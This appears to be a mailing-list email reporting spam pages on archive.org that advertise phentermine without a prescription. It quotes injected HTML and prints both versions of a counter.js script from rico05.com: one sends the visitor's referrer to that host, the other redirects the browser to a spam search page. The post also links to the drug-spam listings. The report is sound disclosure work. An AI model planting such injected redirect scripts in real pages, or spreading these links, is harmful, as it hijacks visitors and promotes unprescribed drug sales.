
<div>Hello:</div>

<div>&nbsp;</div>

<div>I could take a while to investigate this more but I have no time&nbsp;ATM&nbsp;(veeery&nbsp;busy)&nbsp;and the website is under&nbsp;attack. (should be&nbsp;a matter&nbsp;to try that script&nbsp;on some form. Get a virtual pass for the library, digg in the book publishing forms&nbsp;and report back)

</div>

<div>&nbsp;</div>

<div>Try this links:</div>

<div><a href="http://www.archive.org/details/BuyPhentermineOnline_979">http://www.archive.org/details/BuyPhentermineOnline_979</a><br><a href="http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery">

http://www.archive.org/details/BuyPhentermine.noPrescriptionBestPriceFreeDelivery</a></div>

<div>&nbsp;</div>

<div>&nbsp;</div>

<div>Parts of the HTML follows to help spot the hole</div>

<div>&nbsp;</div>

<div>...</div>

<div><br>&lt;a href=&quot;/search.php?query=subject:%22 free delivery%22&quot;&gt; free delivery&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;&lt;p xmlns:fo=&quot;<a href="http://www.w3.org/1999/XSL/Format">http://www.w3.org/1999/XSL/Format

</a>&quot; class=&quot;content&quot; style=&quot;text-align:left;&quot;&gt;&lt;script language=&quot;javascript&quot; src=&quot;<a href="http://rico05.com/counter/counter.js?id=950&amp;key=buy+phentermine&quot;&gt;&lt;/script">

http://rico05.com/counter/counter.js?id=950&amp;key=buy+phentermine&quot;&gt;&lt;/script</a>&gt;<br>&nbsp;</div>

<div>...<br><br>&nbsp;</div>

<div>&nbsp;</div>

<div>/--------- counter.js (called directly)&nbsp;---------/</div>

<div>&nbsp;</div>

<div>var ref = escape(document.referrer);<br>document.write(&#39;\&lt;script&nbsp; language=\&quot;javascript\&quot; src=\&quot;<a href="http://rico05.com/counter/counter.js?ref=&#39;">http://rico05.com/counter/counter.js?ref=&#39;

</a> + ref + &#39;\&quot;\&gt;\&lt;\/script\&gt;&#39;);</div>

<div>&nbsp;</div>

<div>

<div>/----- EOF -----/</div></div>

<div>&nbsp;</div>

<div>&nbsp;</div>

<div>&nbsp;</div>

<div>/--------- counter.js (with referer forged)&nbsp;---------/</div>

<div>&nbsp;</div>

<div>document.location = &#39;<a href="http://rico05.com/search/?said=951&amp;q=buy">http://rico05.com/search/?said=951&amp;q=buy</a> phentermine&#39;;</div>

<div>&nbsp;</div>

<div>/----- EOF -----/</div>

<div>&nbsp;</div>

<div>&nbsp;</div>

<div>And that&#39;s it.&nbsp;A lot of money spamming users.</div>

<div>Who is said=951? Ask <a href="http://rico05.com">rico05.com</a> if they are not a bunch of phishers should tell you.</div>

<div>&nbsp;</div>

<div>Regards</div>

<div>Waldo Alvarez</div>